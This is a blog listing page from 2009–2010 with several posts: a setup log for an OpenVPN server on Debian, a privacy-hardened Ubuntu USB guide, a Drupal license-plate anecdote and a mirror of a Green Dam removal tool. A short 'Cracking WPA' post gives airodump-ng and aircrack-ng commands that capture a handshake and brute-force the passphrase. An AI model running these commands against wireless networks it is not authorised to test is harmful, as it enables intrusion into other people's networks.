deekayen's blog
DRUPAL license plate in NC
LOST: owner of a silver Nissan Altima with a DRUPAL license plate.
Who are you? I'd like to meet up. I had no idea there was someone so into Drupal in Harrisburg, at Dino's Pizza & Pasta.
---
FOUND! It's shrop's car. I shoulda known...
Submitted by deekayen on Wed, 04/21/2010 - 9:49pm
OpenVPN server on Debian Lenny
vi /etc/hostname
mkdir .ssh
cd .ssh
vi authorized_keys
apt-get update
apt-get upgrade
apt-get --no-install-recommends install openvpn bridge-utils openssh-blacklist-extra
vi /etc/ssh/sshd_config
# turn off password logins
vi /etc/sysctl.conf
# turn on ipv4 forwarding
vi /etc/network/interfaces
# turn dhcp into static if you want to
cp -R /usr/share/doc/openvpn/examples/easy-rsa /etc/openvpn/
cd /etc/openvpn/easy-rsa/2.0/
vi vars
# mod defaults on bottom
. ./vars
./clean-all
./build-ca
./build-key-server server
./build-key home
./build-key pleaseignore
./build-key david
./build-dh
cd keys/
cp ca.crt ca.key dh1024.pem server.crt server.key /etc/openvpn
cd /etc/openvpn/
openvpn --genkey --secret ta.key
vi /etc/openvpn/server.conf
port 1194
dev tun
server 10.10.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
#client-config-dir ccd
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
comp-lzo
keepalive 10 60
ping-timer-rem
persist-tun
persist-key
push "route 10.10.0.1 255.255.255.0"
push "redirect-gateway"
push "dhcp-option DNS 75.127.97.6"
client-to-client
#tls-auth ta.key 0
cipher BF-CBC
#cipher DES-EDE3-CBC
#cipher AES-128-CBC
max-clients 20
user nobody
group nogroup
status openvpn-status.log
log /var/log/openvpn.log
log-append /var/log/openvpn.log
verb 2
mute 20
Xen host:
mkdir /dev/net/
mknod /dev/net/tun c 10 200
openvpn --mktun --dev tun0
iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o eth0 -j SNAT --to-source 71.20.22.71
vi /etc/rc.local
iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o eth0 -j SNAT --to-source 71.20.22.71
OpenVZ host (see also):
modprobe tun
vzctl set 101 --devices c:10:200:rw --save
vzctl set 101 --capability net_admin:on --save
vzctl exec 101 mkdir -p /dev/net
vzctl exec 101 mknod /dev/net/tun c 10 200
vzctl exec 101 chmod 600 /dev/net/tun
vzctl set 101 \
--iptables ip_tables \
--iptables ipt_REJECT \
--iptables ipt_tos \
--iptables ipt_limit \
--iptables ipt_multiport \
--iptables iptable_filter \
--iptables iptable_mangle \
--iptables ipt_TCPMSS \
--iptables ipt_tcpmss \
--iptables ipt_ttl \
--iptables ipt_length \
--iptables ipt_conntrack \
--iptables iptable_nat \
--iptables ip_nat_ftp \
--iptables ip_nat_irc \
--iptables ipt_TOS \
--iptables ipt_state \
--savevi /etc/rc.local
iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o venet0 -j SNAT --to-source 71.20.22.71
Submitted by deekayen on Fri, 12/11/2009 - 8:07pm
Cracking WPA
Start airmon-ng on channel 6
sudo airmon-ng start wlan0 6sudo airodump-ng -c 6 --bssid 00:00:00:A0:32:14 -w psk wlan0perl ./wg.pl -l 1 -u 8 -v abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng -e linksys -w - psk-01.capSubmitted by deekayen on Tue, 12/08/2009 - 2:44am
1 attachmentParanoid USB Ubuntu
Download Ubuntu alternate i386 install. x86-64 is nice, but you don't necessarily know you'll be booting a portable drive on a 64bit machine.
Select the USA - Dvorak region.
Create a 100mb /boot partition as ext3 and the rest as a physical volume for encryption. Use twofish 256, *not* the default aes. Then in the encrypted partition, mount / as ext3. If you have lots of extra space, you might make a LVM inside the encrypted partition that contains swap, /, and /home.
Create the account with a name and login of anonymous.
Mozilla addons:
- Adblock Plus
- Google Advertising Cookie Opt-out
- BetterPrivacy
- SkipScreen
- Targeted Advertising Cookie Opt-Out (TACO)
- Torbutton
- NoScript
- Customize Google
- Redirect Cleaner
- Facebook Beacon Blocker
- FireGPG
- Flashblock
- RefControl
- Scroogle or Scroogle
In about:config, toggle dom.storage.enabled to false.
Mozilla (non-privacy related)
Thunderbird
Misc
apt-get update
apt-get upgrade
apt-get purge ubuntuone-client-gnome empathy evolution evolution-common evolution-couchdb evolution-data-server evolution-exchange evolution-indicator evolution-plugins evolution-webcal f-spot xsane xsane-common
edit fstab to not mount /boot by default
apt-get install revelation aircrack-ng vidalia build-essential fakeroot devscripts ettercap-gtk pidgin-otr transmission htop clamtk ndisgtk gnome-rdp filezilla gstm mumble wifi-radar gpa gtkhash gufw thunderbird cvs gettext sshfs gnome-do openssh-server nmap skype macchanger-gtk arp-scan
apt-get install mysql-server apache2 apache2-threaded-dev php5 php5-cgi php5-cli php5-gd php5-common php-pear php5-curl php5-mysql cvs curl php5-mcrypt php5-dev libapache2-mod-php5 gawk patch w32codecs libdvdcss2 non-free-codecs ubuntu-restricted-extras openjdk-6-jre workrave
apt-get purge postfix
Use shred -uzv instead of rm to delete files.
To get automatic hash verification for downloads, use torrent options. In transmission, you can configure it to only accepted encrypted communication from peers and to talk to the tracker through tor.
Create a menu launcher for macchanger-gtk. Use arp-scan by doing something like sudo arp-scan -l -I eth1
Upgrade the GPG signature hash. Sig hashes in high grade SHA will be truncated with traditional 1024D keys, so this probably involves upgrading to a 4096R/4096 key. 1024D key used as an example:
localhost:~ davidnorman$ gpg --version
gpg (GnuPG) 1.4.9
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Home: ~/.gnupg
Supported algorithms:
Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
Cipher: 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH
Hash: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Compression: Uncompressed, ZIP, ZLIB, BZIP2
localhost:~ davidnorman$ gpg --edit-key 87A0709B
gpg (GnuPG) 1.4.9; Copyright (C) 2008 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Secret key is available.
pub 1024D/87A0709B created: 2008-07-31 expires: never usage: SC
trust: unknown validity: unknown
sub 4096g/B8474CFF created: 2008-07-31 expires: never usage: E
sub 2048R/12740831 created: 2008-07-31 expires: never usage: S
[ unknown] (1). David Kent Norman (deekayen) <x@deekayen.net>
Command> setpref SHA512 SHA384 SHA256 SHA224 TWOFISH BLOWFISH 3DES CAST5 AES256 AES192 AES SHA1 RIPEMD160 BZIP2 ZLIB ZIP
Set preference list to:
Cipher: TWOFISH, BLOWFISH, 3DES, CAST5, AES256, AES192, AES
Digest: SHA512, SHA384, SHA256, SHA224, SHA1
Compression: ZIP, Uncompressed
Features: MDC, Keyserver no-modify
Really update the preferences? (y/N) y
You need a passphrase to unlock the secret key for
user: "David Kent Norman (deekayen) <x@deekayen.net>"
1024-bit DSA key, ID 87A0709B, created 2008-07-31
pub 1024D/87A0709B created: 2008-07-31 expires: never usage: SC
trust: unknown validity: unknown
sub 4096g/B8474CFF created: 2008-07-31 expires: never usage: E
sub 2048R/12740831 created: 2008-07-31 expires: never usage: S
[ unknown] (1). David Kent Norman (deekayen) <x@deekayen.net>
Command> q
Save changes? (y/N) y
localhost:~ davidnorman$Submitted by deekayen on Sat, 10/10/2009 - 12:44am
Dam Burst for Green Dam
I don't run Windows nor have I ever used Green Dam Youth Escort software, but I thought it might be nice to mirror the install file of Dam Burst 1.2 - tested with Green Dam 3.17, released September 28th, 2009 by Jon Oberheide.
MD5 (DamBurst-1.2.exe) = bacb81fa63707e78ca1ec66d2241773a
Submitted by deekayen on Wed, 09/30/2009 - 5:36pm
1 attachment
